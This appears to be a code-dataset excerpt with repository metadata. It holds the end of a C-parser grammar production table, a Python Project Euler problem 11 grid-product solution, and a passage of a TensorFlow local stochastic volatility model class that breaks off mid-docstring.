('direct_abstract_declarator -> direct_abstract_declarator LBRACKET TIMES RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_4','parser.py',1455),
('direct_abstract_declarator -> LBRACKET TIMES RBRACKET','direct_abstract_declarator',3,'p_direct_abstract_declarator_5','parser.py',1466),
('direct_abstract_declarator -> direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',4,'p_direct_abstract_declarator_6','parser.py',1475),
('direct_abstract_declarator -> LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_7','parser.py',1485),
('block_item -> declaration','block_item',1,'p_block_item','parser.py',1496),
('block_item -> statement','block_item',1,'p_block_item','parser.py',1497),
('block_item_list -> block_item','block_item_list',1,'p_block_item_list','parser.py',1504),
('block_item_list -> block_item_list block_item','block_item_list',2,'p_block_item_list','parser.py',1505),
('compound_statement -> brace_open block_item_list_opt brace_close','compound_statement',3,'p_compound_statement_1','parser.py',1511),
('labeled_statement -> ID COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_1','parser.py',1517),
('labeled_statement -> CASE constant_expression COLON pragmacomp_or_statement','labeled_statement',4,'p_labeled_statement_2','parser.py',1521),
('labeled_statement -> DEFAULT COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_3','parser.py',1525),
('selection_statement -> IF LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_1','parser.py',1529),
('selection_statement -> IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement','selection_statement',7,'p_selection_statement_2','parser.py',1533),
('selection_statement -> SWITCH LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_3','parser.py',1537),
('iteration_statement -> WHILE LPAREN expression RPAREN pragmacomp_or_statement','iteration_statement',5,'p_iteration_statement_1','parser.py',1542),
('iteration_statement -> DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI','iteration_statement',7,'p_iteration_statement_2','parser.py',1546),
('iteration_statement -> FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',9,'p_iteration_statement_3','parser.py',1550),
('iteration_statement -> FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',8,'p_iteration_statement_4','parser.py',1554),
('jump_statement -> GOTO ID SEMI','jump_statement',3,'p_jump_statement_1','parser.py',1559),
('jump_statement -> BREAK SEMI','jump_statement',2,'p_jump_statement_2','parser.py',1563),
('jump_statement -> CONTINUE SEMI','jump_statement',2,'p_jump_statement_3','parser.py',1567),
('jump_statement -> RETURN expression SEMI','jump_statement',3,'p_jump_statement_4','parser.py',1571),
('jump_statement -> RETURN SEMI','jump_statement',2,'p_jump_statement_4','parser.py',1572),
('expression_statement -> expression_opt SEMI','expression_statement',2,'p_expression_statement','parser.py',1577),
('expression -> assignment_expression','expression',1,'p_expression','parser.py',1584),
('expression -> expression COMMA assignment_expression','expression',3,'p_expression','parser.py',1585),
('typedef_name -> TYPEID','typedef_name',1,'p_typedef_name','parser.py',1597),
('assignment_expression -> conditional_expression','assignment_expression',1,'p_assignment_expression','parser.py',1601),
('assignment_expression -> unary_expression assignment_operator assignment_expression','assignment_expression',3,'p_assignment_expression','parser.py',1602),
('assignment_operator -> EQUALS','assignment_operator',1,'p_assignment_operator','parser.py',1615),
('assignment_operator -> XOREQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1616),
('assignment_operator -> TIMESEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1617),
('assignment_operator -> DIVEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1618),
('assignment_operator -> MODEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1619),
('assignment_operator -> PLUSEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1620),
('assignment_operator -> MINUSEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1621),
('assignment_operator -> LSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1622),
('assignment_operator -> RSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1623),
('assignment_operator -> ANDEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1624),
('assignment_operator -> OREQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1625),
('constant_expression -> conditional_expression','constant_expression',1,'p_constant_expression','parser.py',1630),
('conditional_expression -> binary_expression','conditional_expression',1,'p_conditional_expression','parser.py',1634),
('conditional_expression -> binary_expression CONDOP expression COLON conditional_expression','conditional_expression',5,'p_conditional_expression','parser.py',1635),
('binary_expression -> cast_expression','binary_expression',1,'p_binary_expression','parser.py',1643),
('binary_expression -> binary_expression TIMES binary_expression','binary_expression',3,'p_binary_expression','parser.py',1644),
('binary_expression -> binary_expression DIVIDE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1645),
('binary_expression -> binary_expression MOD binary_expression','binary_expression',3,'p_binary_expression','parser.py',1646),
('binary_expression -> binary_expression PLUS binary_expression','binary_expression',3,'p_binary_expression','parser.py',1647),
('binary_expression -> binary_expression MINUS binary_expression','binary_expression',3,'p_binary_expression','parser.py',1648),
('binary_expression -> binary_expression RSHIFT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1649),
('binary_expression -> binary_expression LSHIFT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1650),
('binary_expression -> binary_expression LT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1651),
('binary_expression -> binary_expression LE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1652),
('binary_expression -> binary_expression GE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1653),
('binary_expression -> binary_expression GT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1654),
('binary_expression -> binary_expression EQ binary_expression','binary_expression',3,'p_binary_expression','parser.py',1655),
('binary_expression -> binary_expression NE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1656),
('binary_expression -> binary_expression AND binary_expression','binary_expression',3,'p_binary_expression','parser.py',1657),
('binary_expression -> binary_expression OR binary_expression','binary_expression',3,'p_binary_expression','parser.py',1658),
('binary_expression -> binary_expression XOR binary_expression','binary_expression',3,'p_binary_expression','parser.py',1659),
('binary_expression -> binary_expression LAND binary_expression','binary_expression',3,'p_binary_expression','parser.py',1660),
('binary_expression -> binary_expression LOR binary_expression','binary_expression',3,'p_binary_expression','parser.py',1661),
('cast_expression -> unary_expression','cast_expression',1,'p_cast_expression_1','parser.py',1669),
('cast_expression -> LPAREN type_name RPAREN cast_expression','cast_expression',4,'p_cast_expression_2','parser.py',1673),
('unary_expression -> postfix_expression','unary_expression',1,'p_unary_expression_1','parser.py',1677),
('unary_expression -> PLUSPLUS unary_expression','unary_expression',2,'p_unary_expression_2','parser.py',1681),
('unary_expression -> MINUSMINUS unary_expression','unary_expression',2,'p_unary_expression_2','parser.py',1682),
('unary_expression -> unary_operator cast_expression','unary_expression',2,'p_unary_expression_2','parser.py',1683),
('unary_expression -> SIZEOF unary_expression','unary_expression',2,'p_unary_expression_3','parser.py',1688),
('unary_expression -> SIZEOF LPAREN type_name RPAREN','unary_expression',4,'p_unary_expression_3','parser.py',1689),
('unary_operator -> AND','unary_operator',1,'p_unary_operator','parser.py',1697),
('unary_operator -> TIMES','unary_operator',1,'p_unary_operator','parser.py',1698),
('unary_operator -> PLUS','unary_operator',1,'p_unary_operator','parser.py',1699),
('unary_operator -> MINUS','unary_operator',1,'p_unary_operator','parser.py',1700),
('unary_operator -> NOT','unary_operator',1,'p_unary_operator','parser.py',1701),
('unary_operator -> LNOT','unary_operator',1,'p_unary_operator','parser.py',1702),
('postfix_expression -> primary_expression','postfix_expression',1,'p_postfix_expression_1','parser.py',1707),
('postfix_expression -> postfix_expression LBRACKET expression RBRACKET','postfix_expression',4,'p_postfix_expression_2','parser.py',1711),
('postfix_expression -> postfix_expression LPAREN argument_expression_list RPAREN','postfix_expression',4,'p_postfix_expression_3','parser.py',1715),
('postfix_expression -> postfix_expression LPAREN RPAREN','postfix_expression',3,'p_postfix_expression_3','parser.py',1716),
('postfix_expression -> postfix_expression PERIOD ID','postfix_expression',3,'p_postfix_expression_4','parser.py',1721),
('postfix_expression -> postfix_expression PERIOD TYPEID','postfix_expression',3,'p_postfix_expression_4','parser.py',1722),
('postfix_expression -> postfix_expression ARROW ID','postfix_expression',3,'p_postfix_expression_4','parser.py',1723),
('postfix_expression -> postfix_expression ARROW TYPEID','postfix_expression',3,'p_postfix_expression_4','parser.py',1724),
('postfix_expression -> postfix_expression PLUSPLUS','postfix_expression',2,'p_postfix_expression_5','parser.py',1730),
('postfix_expression -> postfix_expression MINUSMINUS','postfix_expression',2,'p_postfix_expression_5','parser.py',1731),
('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list brace_close','postfix_expression',6,'p_postfix_expression_6','parser.py',1736),
('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close','postfix_expression',7,'p_postfix_expression_6','parser.py',1737),
('primary_expression -> identifier','primary_expression',1,'p_primary_expression_1','parser.py',1742),
('primary_expression -> constant','primary_expression',1,'p_primary_expression_2','parser.py',1746),
('primary_expression -> unified_string_literal','primary_expression',1,'p_primary_expression_3','parser.py',1750),
('primary_expression -> unified_wstring_literal','primary_expression',1,'p_primary_expression_3','parser.py',1751),
('primary_expression -> LPAREN expression RPAREN','primary_expression',3,'p_primary_expression_4','parser.py',1756),
('primary_expression -> OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN','primary_expression',6,'p_primary_expression_5','parser.py',1760),
('offsetof_member_designator -> identifier','offsetof_member_designator',1,'p_offsetof_member_designator','parser.py',1768),
('offsetof_member_designator -> offsetof_member_designator PERIOD identifier','offsetof_member_designator',3,'p_offsetof_member_designator','parser.py',1769),
('offsetof_member_designator -> offsetof_member_designator LBRACKET expression RBRACKET','offsetof_member_designator',4,'p_offsetof_member_designator','parser.py',1770),
('argument_expression_list -> assignment_expression','argument_expression_list',1,'p_argument_expression_list','parser.py',1783),
('argument_expression_list -> argument_expression_list COMMA assignment_expression','argument_expression_list',3,'p_argument_expression_list','parser.py',1784),
('identifier -> ID','identifier',1,'p_identifier','parser.py',1793),
('constant -> INT_CONST_DEC','constant',1,'p_constant_1','parser.py',1797),
('constant -> INT_CONST_OCT','constant',1,'p_constant_1','parser.py',1798),
('constant -> INT_CONST_HEX','constant',1,'p_constant_1','parser.py',1799),
('constant -> INT_CONST_BIN','constant',1,'p_constant_1','parser.py',1800),
('constant -> FLOAT_CONST','constant',1,'p_constant_2','parser.py',1819),
('constant -> HEX_FLOAT_CONST','constant',1,'p_constant_2','parser.py',1820),
('constant -> CHAR_CONST','constant',1,'p_constant_3','parser.py',1836),
('constant -> WCHAR_CONST','constant',1,'p_constant_3','parser.py',1837),
('unified_string_literal -> STRING_LITERAL','unified_string_literal',1,'p_unified_string_literal','parser.py',1848),
('unified_string_literal -> unified_string_literal STRING_LITERAL','unified_string_literal',2,'p_unified_string_literal','parser.py',1849),
('unified_wstring_literal -> WSTRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','parser.py',1859),
('unified_wstring_literal -> unified_wstring_literal WSTRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','parser.py',1860),
('brace_open -> LBRACE','brace_open',1,'p_brace_open','parser.py',1870),
('brace_close -> RBRACE','brace_close',1,'p_brace_close','parser.py',1876),
('empty -> <empty>','empty',0,'p_empty','parser.py',1882),
]
| [
"haoyuanwang102@gmail.com"
] | haoyuanwang102@gmail.com |
4890969158ca19bf54df4014f997c969351e991d | e003a165387aeda6b11886e4936e54915f88d913 | /p11.py | 160dd08b830018fd0a44c9f88a4ad88635b1cbf6 | [] | no_license | tommy-dk/projecteuler | 8ac45b591022edfdcb126bb0f79609531c799292 | 31bc327800040622b29ecfbeec64f746759e35fe | refs/heads/master | 2021-03-12T23:02:51.761085 | 2016-10-23T11:41:15 | 2016-10-23T11:41:15 | 1,524,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,518 | py | #!/usr/bin/env python
import time
st = time.time()  # start wall-clock timer; elapsed time is printed at the end
# 20x20 grid of numbers from Project Euler problem 11, stored as a tuple of
# row tuples: nums[row][col].
nums = (
( 8, 2,22,97,38,15, 0,40, 0,75, 4, 5, 7,78,52,12,50,77,91, 8,),
(49,49,99,40,17,81,18,57,60,87,17,40,98,43,69,48, 4,56,62, 0,),
(81,49,31,73,55,79,14,29,93,71,40,67,53,88,30, 3,49,13,36,65,),
(52,70,95,23, 4,60,11,42,69,24,68,56, 1,32,56,71,37, 2,36,91,),
(22,31,16,71,51,67,63,89,41,92,36,54,22,40,40,28,66,33,13,80,),
(24,47,32,60,99, 3,45, 2,44,75,33,53,78,36,84,20,35,17,12,50,),
(32,98,81,28,64,23,67,10,26,38,40,67,59,54,70,66,18,38,64,70,),
(67,26,20,68, 2,62,12,20,95,63,94,39,63, 8,40,91,66,49,94,21,),
(24,55,58, 5,66,73,99,26,97,17,78,78,96,83,14,88,34,89,63,72,),
(21,36,23, 9,75, 0,76,44,20,45,35,14, 0,61,33,97,34,31,33,95,),
(78,17,53,28,22,75,31,67,15,94, 3,80, 4,62,16,14, 9,53,56,92,),
(16,39, 5,42,96,35,31,47,55,58,88,24, 0,17,54,24,36,29,85,57,),
(86,56, 0,48,35,71,89, 7, 5,44,44,37,44,60,21,58,51,54,17,58,),
(19,80,81,68, 5,94,47,69,28,73,92,13,86,52,17,77, 4,89,55,40,),
( 4,52, 8,83,97,35,99,16, 7,97,57,32,16,26,26,79,33,27,98,66,),
(88,36,68,87,57,62,20,72, 3,46,33,67,46,55,12,32,63,93,53,69,),
( 4,42,16,73,38,25,39,11,24,94,72,18, 8,46,29,32,40,62,76,36,),
(20,69,36,41,72,30,23,88,34,62,99,69,82,67,59,85,74, 4,36,16,),
(20,73,35,29,78,31,90, 1,74,31,49,71,48,86,81,16,23,57, 5,54,),
( 1,70,54,71,83,51,54,69,16,92,33,48,61,43,52, 1,89,19,67,48,),
)
def right(x,y):
    """Product of four horizontally adjacent values starting at (x, y).

    Returns 0 when the run of four would fall off the right edge of the
    20x20 grid.
    """
    if x > 20-4:
        return 0
    product = 1
    for offset in xrange(0,4):
        product *= nums[y][x+offset]
    return product
def down(x,y):
    """Product of four vertically adjacent values starting at (x, y).

    Returns 0 when the run of four would fall off the bottom edge of the
    20x20 grid.
    """
    if y > 20-4:
        return 0
    product = 1
    for offset in xrange(0,4):
        product *= nums[y+offset][x]
    return product
def diag_right(x,y):
    """Product of four down-right diagonal values starting at (x, y).

    Returns 0 when the diagonal run of four would leave the 20x20 grid.
    """
    if x > 20-4 or y > 20-4:
        return 0
    product = 1
    for offset in xrange(0,4):
        product *= nums[y+offset][x+offset]
    return product
def diag_left(x,y):
    """Product of four down-left diagonal values starting at (x, y).

    Returns 0 when the diagonal run of four would leave the 20x20 grid.
    """
    if x < 3 or y > 20-4:
        return 0
    product = 1
    for offset in xrange(0,4):
        product *= nums[y+offset][x-offset]
    return product
total = 0
# Scan every starting cell and keep the largest product found over the four
# scan directions (right, down, down-right, down-left). Out-of-range runs
# contribute 0 and therefore never win.
for x in xrange(0,20):
    for y in xrange(0,20):
        for candidate in (right(x,y), down(x,y), diag_right(x,y), diag_left(x,y)):
            if candidate > total:
                total = candidate
print (total)
print ("Time taken: %s" % str(time.time() - st))
| [
"tho@danskespil.dk"
] | tho@danskespil.dk |
2ae2ad897bb8822cbdc7b5ce0e30b526761062cd | 00cb5907750926f1a9b0fde97301f10d01f49645 | /tf_quant_finance/experimental/local_stochastic_volatility/local_stochastic_volatility_model.py | 0502cc8f587b533bfd4c7c39c011e4add8ee24ea | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla"
] | permissive | dannyb2018/tf-quant-finance | 63761e4a39b615da6a5258e48030d2b12a142b26 | 668b4fb0f91b1f60c9015cef087b3e879ee2a4f7 | refs/heads/master | 2023-07-07T20:00:59.529305 | 2021-08-18T13:05:11 | 2021-08-18T13:05:51 | 284,707,826 | 0 | 0 | Apache-2.0 | 2020-08-03T13:29:15 | 2020-08-03T13:29:14 | null | UTF-8 | Python | false | false | 33,519 | py | # Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Local Stochastic Volatility process."""
import functools
import numpy as np
import tensorflow.compat.v2 as tf
from tf_quant_finance import datetime as dates
from tf_quant_finance import math
from tf_quant_finance.experimental import local_volatility as lvm
from tf_quant_finance.experimental.pricing_platform.framework.market_data import utils
from tf_quant_finance.math import pde
from tf_quant_finance.math.interpolation import linear
from tf_quant_finance.models import generic_ito_process
class LocalStochasticVolatilityModel(generic_ito_process.GenericItoProcess):
  r"""Local stochastic volatility model.

  Local stochastic volatility (LSV) models assume that the spot price of an
  asset follows the following stochastic differential equation under the risk
  neutral measure [1]:

  ```None
    dS(t) / S(t) = (r - d) dt + sqrt(v(t)) * L(t, S(t)) * dW_s(t)
    dv(t) = a(v(t)) dt + b(v(t)) dW_v(t)
    E[dW_s(t)dW_v(t)] = rho dt
  ```

  where `r` and `d` denote the risk free interest rate and dividend yield
  respectively. `S(t)` is the spot price, `v(t)` denotes the stochastic variance
  and the function `L(t, S(t))` is the leverage function which is calibrated
  using the volatility smile data. The functions `a(v(t))` and `b(v(t))` denote
  the drift and volatility of the stochastic process for the variance and `rho`
  denotes the instantaneous correlation between the spot and the variance
  process. LSV models thus combine the local volatility dynamics with
  stochastic volatility.

  Using the relationship between the local volatility and the expectation of
  future instantaneous variance, leverage function can be computed as follows
  [2]:

  ```
  sigma(T,K)^2 = L(T,K)^2 * E[v(T)|S(T)=K]
  ```

  where the local volatility function `sigma(T,K)` can be computed using the
  Dupire's formula.

  The `LocalStochasticVolatilityModel` class contains a generic implementation
  of the LSV model with the flexibility to specify an arbitrary variance
  process. The default variance process is a Heston type process with
  mean-reverting variance (as in Ref. [1]):

  ```
  dv(t) = k(m - v(t)) dt + alpha*sqrt(v(t)) dW_v(t)
  ```

  #### References:
    [1]: Iain J. Clark. Foreign exchange option pricing - A Practitioner's
      guide. Chapter 5. 2011.
    [2]: I. Gyongy. Mimicking the one-dimensional marginal distributions of
      processes having an ito differential. Probability Theory and Related
      Fields, 71, 1986.
  """

  def __init__(self,
               leverage_fn,
               variance_process,
               risk_free_rate=None,
               dividend_yield=None,
               rho=None,
               dtype=None,
               name=None):
    """Initializes the Local stochastic volatility model.

    Args:
      leverage_fn: A Python callable which returns the Leverage function
        `L(t, S(t))` as a function of state and time. The function must accept
        a scalar `Tensor` corresponding to time 't' and a real `Tensor` of shape
        `[num_samples, 1]` corresponding to the underlying price (S) as
        inputs and return a real `Tensor` containing the leverage function
        computed at (S,t).
      variance_process: An instance of `ItoProcess` specifying the
        dynamics of the variance process of the LSV model. The
        `variance_process` should implement a one-factor stochastic process.
        For the common version of Heston like variance model use
        `LSVVarianceModel`.
      risk_free_rate: An optional scalar real `Tensor` specifying the
        (continuously compounded) risk free interest rate. If the underlying is
        an FX rate, then use this input to specify the domestic interest rate.
        Note that the current implementation supports constant interest rates
        and dividend yield.
        Default value: `None` in which case the input is set to zero.
      dividend_yield: An optional real scalar `Tensor` specifying the
        (continuously compounded) dividend yield. If the underlying is an FX
        rate, then use this input to specify the foreign interest rate.
        Note that the current implementation supports constant interest rates
        and dividend yield.
        Default value: `None` in which case the input is set to zero.
      rho: A real scalar `Tensor` specifying the correlation between the
        underlying spot price and the variance process.
        Default value: `None` in which case cross correlations are assumed
        to be zero.
      dtype: The default dtype to use when converting values to `Tensor`s.
        Default value: `None` which means that default dtypes inferred by
        TensorFlow are used.
      name: Python string. The name to give to the ops created by this class.
        Default value: `None` which maps to the default name
        `local_stochastic_volatility_model`.
    """
    self._name = name or "local_stochastic_volatility_model"
    with tf.name_scope(self._name):
      if risk_free_rate is None:
        risk_free_rate = 0.0
      if dividend_yield is None:
        dividend_yield = 0.0

      self._risk_free_rate = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
      # Bug fix: previously this read `self._domestic_rate`, an attribute that
      # is never assigned, so constructing the model with `dtype=None` raised
      # an AttributeError. Infer the dtype from the converted risk free rate.
      self._dtype = dtype or self._risk_free_rate.dtype
      self._dividend_yield = tf.convert_to_tensor(dividend_yield, dtype=dtype)
      self._leverage_fn = leverage_fn
      self._variance_process = variance_process
      # State dimension: one spot factor plus the variance factor(s).
      dim = 1 + variance_process.dim()
      rho = rho or 0.0
      self._rho = _create_corr_matrix(rho, self._dtype)
      self._sqrt_rho = tf.linalg.cholesky(self._rho)

      def _vol_fn(t, state):
        """Volatility function of LSV model."""
        num_samples = state.shape.as_list()[0]
        broadcasted_t = tf.broadcast_to(t, [1, num_samples])
        spot_prices = state[:, 0]
        variance = state[:, 1:]
        level_fun = self._leverage_fn(
            broadcasted_t, tf.expand_dims(spot_prices, axis=0))
        # Spot diffusion: L(t, S) * S * sqrt(v).
        spot_diffusion = tf.expand_dims(
            level_fun[0, :], axis=-1) * tf.expand_dims(
                spot_prices, axis=-1) * tf.math.sqrt(variance)
        variance_diffusion = self._variance_process.volatility_fn()(
            t, variance)
        diffusion = tf.concat([spot_diffusion, variance_diffusion], axis=1)
        diffusion = tf.expand_dims(diffusion, axis=-2)
        # Correlate the Brownian drivers via the Cholesky factor of `rho`.
        return diffusion * self._sqrt_rho

      # Drift function
      def _drift_fn(t, state):
        """Drift function of LSV model."""
        # Risk-neutral spot drift: (r - d) * S.
        spot_drift = (
            self._risk_free_rate - self._dividend_yield) * state[:, :1]
        variance_drift = self._variance_process.drift_fn()(t, state[:, 1:])
        return tf.concat([spot_drift, variance_drift], axis=1)

      super(LocalStochasticVolatilityModel,
            self).__init__(dim, _drift_fn, _vol_fn, self._dtype, self._name)

  @classmethod
  def from_market_data(cls,
                       valuation_date,
                       expiry_dates,
                       strikes,
                       implied_volatilities,
                       variance_process,
                       initial_spot,
                       initial_variance,
                       rho=None,
                       risk_free_rate=None,
                       dividend_yield=None,
                       time_step=None,
                       num_grid_points=None,
                       grid_minimums=None,
                       grid_maximums=None,
                       dtype=None):
    """Creates a `LocalStochasticVolatilityModel` from market data.

    This function computes the leverage function for the LSV model by first
    computing the joint probability density function `p(t, X(t), v(t))` where
    `X(t)` is the log of the spot price and `v(t)` is the variance at time `t`.
    The joint probability density is computed using the Fokker-Planck equation
    of the LSV model (see 6.8.2 in Ref [1]):

    ```None
    dp/dt = 1/2 d^2 [v L(t,X)^2 p]/dX^2 + 1/2 d^2 [b(v)^2 p]/dv^2 +
            rho d^2 [sqrt(v)L(t,X)b(v) p]/dXdv -
            d[(r - d - 1/2 v L(t,X)^2)p]/dX -
            d[a(v) p]/dv
    ```

    where `a(v)` and `b(v)` are the drift and diffusion functions for the
    variance process. Defining

    ```None
    I_n(k,t) = int v^n p(t, k, v) dv
    ```

    we can calculate the leverage function as follows:

    ```None
    L(k, t) = sigma(exp(k), t) sqrt(I_0(k, t)/I_1(k, t)).
    ```

    Note that the computation of `I_0` and `I_1` require the knowledge of
    leverage function and hence the computation of the leverage function is
    implicit in nature.

    Args:
      valuation_date: A scalar `DateTensor` specifying the valuation
        (or settlement) date for the market data.
      expiry_dates: A `DateTensor` of shape `(num_expiries,)` containing the
        expiry dates on which the implied volatilities are specified.
      strikes: A `Tensor` of real dtype and shape `(num_expiries,
        num_strikes)` specifying the strike prices at which implied volatilities
        are specified.
      implied_volatilities: A `Tensor` of real dtype and shape `(num_expiries,
        num_strikes)` specifying the implied volatilities.
      variance_process: An instance of `LSVVarianceModel` or
        `ItoProcess` specifying the dynamics of the variance process of
        the LSV model.
      initial_spot: A real scalar `Tensor` specifying the underlying spot price
        on the valuation date.
      initial_variance: A real scalar `Tensor` specifying the initial variance
        on the valuation date.
      rho: A real scalar `Tensor` specifying the correlation between spot price
        and the stochastic variance.
      risk_free_rate: A real scalar `Tensor` specifying the (continuously
        compounded) risk free interest rate. If the underlying is an FX rate,
        then use this input to specify the domestic interest rate.
        Default value: `None` in which case the input is set to zero.
      dividend_yield: A real scalar `Tensor` specifying the (continuously
        compounded) dividend yield. If the underlying is an FX rate, then use
        this input to specify the foreign interest rate.
        Default value: `None` in which case the input is set to zero.
      time_step: A real scalar `Tensor` specifying the time step during the
        numerical solution of the Fokker-Planck PDE.
        Default value: None, in which case `time_step` corresponding to 100 time
        steps is used.
      num_grid_points: A scalar integer `Tensor` specifying the number of
        discretization points for each spatial dimension.
        Default value: None, in which case number of grid points is set to 100.
      grid_minimums: An optional `Tensor` of size 2 containing the minimum grid
        points for PDE spatial discretization. `grid_minimums[0]` correspond
        to the minimum spot price in the spatial grid and `grid_minimums[1]`
        correspond to the minimum variance value.
      grid_maximums: An optional `Tensor` of size 2 containing the maximum grid
        points for PDE spatial discretization. `grid_maximums[0]` correspond
        to the maximum spot price in the spatial grid and `grid_maximums[1]`
        correspond to the maximum variance value.
      dtype: The default dtype to use when converting values to `Tensor`s.
        Default value: `None` which means that default dtypes inferred by
        TensorFlow are used.

    Returns:
      An instance of `LocalStochasticVolatilityModel` constructed using the
      input data.
    """
    if risk_free_rate is None:
      discount_factor_fn = lambda t: tf.ones_like(t, dtype=dtype)
    else:
      r = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
      discount_factor_fn = lambda t: tf.math.exp(-r * t)
    lv_model = lvm.LocalVolatilityModel.from_market_data(
        dim=1,
        valuation_date=valuation_date,
        expiry_dates=expiry_dates,
        strikes=strikes,
        implied_volatilities=implied_volatilities,
        spot=initial_spot,
        discount_factor_fn=discount_factor_fn,
        dividend_yield=dividend_yield,
        dtype=dtype)

    dtype = dtype or lv_model.dtype()
    # Horizon of the PDE solve: time to the furthest expiry (act/365 fixed).
    max_time = tf.math.reduce_max(
        dates.daycount_actual_365_fixed(
            start_date=valuation_date, end_date=expiry_dates, dtype=dtype))
    if time_step is None:
      time_step = max_time / 100.0

    rho = rho or 0.0
    num_grid_points = num_grid_points or 100

    leverage_fn = _leverage_function_using_pde(
        risk_free_rate=risk_free_rate,
        dividend_yield=dividend_yield,
        lv_model=lv_model,
        variance_model=variance_process,
        rho=[rho],
        initial_spot=initial_spot,
        initial_variance=initial_variance,
        time_step=time_step,
        max_time=max_time,
        num_grid_points=num_grid_points,
        grid_minimums=grid_minimums,
        grid_maximums=grid_maximums,
        dtype=dtype)
    return LocalStochasticVolatilityModel(
        leverage_fn,
        variance_process,
        risk_free_rate=risk_free_rate,
        dividend_yield=dividend_yield,
        rho=rho,
        dtype=dtype)

  @classmethod
  def from_volatility_surface(cls,
                              implied_volatility_surface,
                              variance_process,
                              initial_spot,
                              initial_variance,
                              rho=None,
                              risk_free_rate=None,
                              dividend_yield=None,
                              time_step=None,
                              num_grid_points=None,
                              grid_minimums=None,
                              grid_maximums=None,
                              dtype=None):
    """Creates a `LocalStochasticVolatilityModel` from volatility surface.

    This function computes the leverage function for the LSV model by first
    computing the joint probability density function `p(t, X(t), v(t))` where
    `X(t)` is the log of the spot price and `v(t)` is the variance at time `t`.
    The joint probability density is computed using the Fokker-Planck equation
    of the LSV model (see 6.8.2 in Ref [1]):

    ```None
    dp/dt = 1/2 d^2 [v L(t,X)^2 p]/dX^2 + 1/2 d^2 [b(v)^2 p]/dv^2 +
            rho d^2 [sqrt(v)L(t,X)b(v) p]/dXdv -
            d[(r - d - 1/2 v L(t,X)^2)p]/dX -
            d[a(v) p]/dv
    ```

    where `a(v)` and `b(v)` are the drift and diffusion functions for the
    variance process. Defining

    ```None
    I_n(k,t) = int v^n p(t, k, v) dv
    ```

    we can calculate the leverage function as follows:

    ```None
    L(k, t) = sigma(exp(k), t) sqrt(I_0(k, t)/I_1(k, t)).
    ```

    Args:
      implied_volatility_surface: Either an instance of
        `processed_market_data.VolatilitySurface` or a Python object containing
        the implied volatility market data. If the input is a Python object,
        then the object must implement a function `volatility(strike,
        expiry_times)` which takes real `Tensor`s corresponding to option
        strikes and time to expiry and returns a real `Tensor` containing the
        corresponding market implied volatility.
      variance_process: An instance of `LSVVarianceModel` or
        `ItoProcess`specifying the dynamics of the variance process of
        the LSV model.
      initial_spot: A real scalar `Tensor` specifying the underlying spot price
        on the valuation date.
      initial_variance: A real scalar `Tensor` specifying the initial variance
        on the valuation date.
      rho: A real scalar `Tensor` specifying the correlation between spot price
        and the stochastic variance.
      risk_free_rate: A real scalar `Tensor` specifying the (continuously
        compounded) risk free interest rate. If the underlying is an FX rate,
        then use this input to specify the domestic interest rate.
        Default value: `None` in which case the input is set to zero.
      dividend_yield: A real scalar `Tensor` specifying the (continuously
        compounded) dividend yield. If the underlying is an FX rate, then use
        this input to specify the foreign interest rate.
        Default value: `None` in which case the input is set to zero.
      time_step: An optional real scalar `Tensor` specifying the time step
        during the numerical solution of the Fokker-Planck PDE.
        Default value: None, in which case `time_step` corresponding to 100 time
        steps is used.
      num_grid_points: A scalar integer `Tensor` specifying the number of
        discretization points for each spatial dimension.
        Default value: None, in which case number of grid points is set to 100.
      grid_minimums: An optional `Tensor` of size 2 containing the minimum grid
        points for PDE spatial discretization. `grid_minimums[0]` correspond
        to the minimum spot price in the spatial grid and `grid_minimums[1]`
        correspond to the minimum variance value.
      grid_maximums: An optional `Tensor` of size 2 containing the maximum grid
        points for PDE spatial discretization. `grid_maximums[0]` correspond
        to the maximum spot price in the spatial grid and `grid_maximums[1]`
        correspond to the maximum variance value.
